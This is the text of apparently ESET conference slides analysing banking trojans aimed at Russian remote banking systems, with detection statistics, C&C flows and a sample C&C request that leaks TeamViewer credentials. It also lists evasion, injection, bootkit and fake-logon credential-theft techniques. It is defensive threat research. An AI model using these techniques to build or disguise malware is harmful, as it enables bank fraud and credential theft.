![Page 1: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/1.jpg)
Modern malware techniques for attacking RBS systems in Russia
Aleksandr Matrosov
Eugene Rodionov
![Page 2: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/2.jpg)
Who we are?
Malware researchers at ESET
- complex threats analysis
- development of cleaning tools
- tracking new malware techniques
- investigation of cybercrime groups
http://www.joineset.com/
![Page 3: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/3.jpg)
Agenda
o Cybercrime trends in RBS
o Most prevalent threats and incidents
Win32/Shiz
Win32/Hodprot
Win32/Sheldor
Win32/RDPdoor
Win32/Carberp
o Carberp cybercrime group revenue
![Page 4: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/4.jpg)
Overview
2010/11: years of attacks on Russian banks • number of incidents has more than doubled compared to 2010*
Over 92%* of incidents involve banking trojans
Malware tailored to Russian banks and payment
systems
However! • Can (and IS) used in other countries as well
*research report "The Russian cybercrime market in 2010: status and trends” http://www.group-ib.ru/wp-content/uploads/2011/04/Group-IB_Report_Russian-cybercrime-market_2010_eng.pdf
![Page 5: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/5.jpg)
![Page 6: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/6.jpg)
Interesting facts about Russian bank fraud
These guys are still free!
![Page 7: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/7.jpg)
![Page 8: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/8.jpg)
Evolution of RBS trojans
o RBS Trojans 2009-2010:
Win32/Shiz (2009)
Win32/Carberp
Win32/Hodprot
Win32/Sheldor
Win32/RDPdoor
o RBS Trojans 2011:
Multiple updates
Growing incidents numbers
….
Win32/Carberp with Bootkit
![Page 9: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/9.jpg)
Cybercrime landscape (2010)
![Page 10: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/10.jpg)
Cybercrime landscape (2011)
![Page 11: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/11.jpg)
Cybercrime landscape (2011)
![Page 12: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/12.jpg)
![Page 13: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/13.jpg)
Win32/Spy.Shiz
![Page 14: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/14.jpg)
Win32/Spy.Shiz detection statistics by month Cloud data from Live Grid
August 2009 – November 2011
![Page 15: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/15.jpg)
Win32/Spy.Shiz detection statistics by country Cloud data from Live Grid
![Page 16: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/16.jpg)
Win32/Spy.Shiz: stealing money
![Page 17: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/17.jpg)
![Page 18: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/18.jpg)
Win32/Hodprot
![Page 19: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/19.jpg)
July 2010 – November 2011
Win32/Hodprot detection statistics by month Cloud data from Live Grid
![Page 20: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/20.jpg)
Win32/Hodprot detection statistics by country Cloud data from Live Grid
![Page 21: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/21.jpg)
Win32/Hodprot: antiforensics
Main module
Original sfcfiles.dll Kernel - driver image
Loader code
C&C URLs
![Page 22: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/22.jpg)
Win32/Hodprot: injecting payload
Browser Address Space
sfc.sys
Setupapi.dll
Payload
System Registry
User-mode
Kernel-mode
Winlogon Address Space
sfcfiles.dll
UpdatePayload
Inject Payload
Assemble Payload
Inject PayloadAssemble PayloadInstall & Load
Driver
![Page 23: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/23.jpg)
Win32/Hodprot: C&C protocol
Win32/Hodprot C&C Server
Send request (bot ID, integer)
Reply with updated modules and image to
execute
Handle Request
Update the bot’s modules, run downloaded
exeutableSend Status Information
![Page 24: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/24.jpg)
Win32/Sheldor & Win32/RDPdoor
![Page 25: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/25.jpg)
Win32/Sheldor and TeamViewer in action
infected
computer
TeamViewer
cloud
Win32/Sheldor
C&C GET
/getinfo.php?id=414%20034%20883&pwd
=6655&stat=1
1 2
3
4
1. Request cloud ID
2. Set cloud ID
3. Send ID to C&C
4. Malicious connection
![Page 26: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/26.jpg)
Under the hood: DLL hooking
TV.dll
(proxy DLL)
TeamViewer.exe
TS.dll
(original TS.dll)
![Page 27: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/27.jpg)
Malicious DLL call graph
![Page 28: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/28.jpg)
Malicious DLL decompilation
Load original TS.dll
Hook functions
Functions for calling
from original TS.dll
C&C URL
![Page 29: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/29.jpg)
Sheldor C&C panel
![Page 30: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/30.jpg)
Win32/RDPdoor installation
infected
computer
Win32/RDPdoor
C&C
1
2
run dropper and send system information
authentication on C&C and provide Thinsoft BeTwin for installation
3 send status information
![Page 31: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/31.jpg)
Stealing authentication data
1. Install GINA extension DLL
2. Display fake logon screen
3. Capture user name &
password
4. Send to C&C
![Page 32: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/32.jpg)
Win32/Carberp
![Page 33: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/33.jpg)
January 2010 – November 2011
Win32/Carberp detections over time in Russia Cloud data from Live Grid
![Page 34: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/34.jpg)
Win32/Carberp detection statistics by country Cloud data from Live Grid
![Page 35: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/35.jpg)
Self-protecting Functionality
Bypassing AV-emulators many calls of rare WinAPI functions
Code injection method ZwQueueApcThread()
ZwResumeThread()
Unhooking method checking first bytes of API function
body and deleting hooks
Command and string encryption custom encryption algorithm
Bot authentication on C&C file with authentication data stored on
infected PC
Network communication encryption base64( RC2(data) )
API function calls obfuscation custom hash algorithm
Detection of AV hooks comparison of the first original bytes
Bypassing static AV signatures appending random junk bytes to
dropped files
Hiding in the system hooking system functions
bootkit infector (September 2011)
![Page 36: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/36.jpg)
Carberp going deeper since September 2011
![Page 37: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/37.jpg)
![Page 38: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/38.jpg)
Carberp going deeper since September 2011
Load MBR
Load VBR
Load bootmgr
Load winload.exe or winresume.exe
real mode
real mode/protected mode
Load kernel and boot
start drivers
real mode/protected mode
Load bootstrap
code
real mode/protected mode
real mode
Target of Rovnix & Carberp
![Page 39: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/39.jpg)
MBR VBR Bootstrap Code File System Data
VBRMalicious
CodeFile System Data
Bootstrap Code
MBR
NTFS bootstrap code(15 sectors)
Before Infecting
After Infecting
Malicious Unsigned
Driver
CompressedData
o Carberp overwrites bootstrap code of the active
partition
o The malicious driver is written either: before active partition, in case there is enough space
in the end of the hard drive, otherwise
Carberp: Infected Partition Layout
![Page 40: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/40.jpg)
![Page 41: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/41.jpg)
Interesting strings and investigation
![Page 42: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/42.jpg)
![Page 43: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/43.jpg)
Win32/Carberp: money stealing methods
Stealing techniques Functionality
Web-injects/Autoloads
(IE, FF, Chrome, Opera)
inserting the specified JS-code into HTML
returned by the online banking site
Backconnect backdoor
(RDP/VNC)
loading on request special binary module
(RDPdoor, custom VNC client)
Keylogger (based on WinAPI) recording keyboard events into logfile
ScreenSpy (based on WinAPI) saving screenshots into logfile
Grabbers (Form, FTP, Pass) loading on request special binary module
Custom plugins for RBS binary modules for specified RBS (sber.plug)
![Page 44: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/44.jpg)
Win32/Carberp botnet control panel
![Page 45: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/45.jpg)
C&C with stolen data
![Page 46: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/46.jpg)
Cab-files with stolen data
![Page 47: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/47.jpg)
Stolen data: BS-Client IB system
![Page 48: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/48.jpg)
Stolen data: CyberPlat payment system
![Page 49: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/49.jpg)
Stolen data: iBank IB system
![Page 50: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/50.jpg)
Stolen data: SberBank IB
![Page 51: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/51.jpg)
Stolen data: UkrSibBank IB
![Page 52: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/52.jpg)
References
“Cybercrime in Russia: Trends and issues”
http://go.eset.com/us/resources/white-papers/CARO_2011.pdf
“Evolution of Win32/Carberp: going deeper”
http://blog.eset.com/2011/11/21/evolution-of-win32carberp-going-deeper
“Hodprot: Hot to Bot”
http://go.eset.com/us/resources/white-papers/Hodprot-Report.pdf
Follow ESET Threat Blog http://blog.eset.com
![Page 53: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/53.jpg)
Questions
![Page 54: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/54.jpg)
Thank you for your attention ;)
Aleksandr Matrosov [email protected]
@matrosov
Eugene Rodionov [email protected]
@vxradius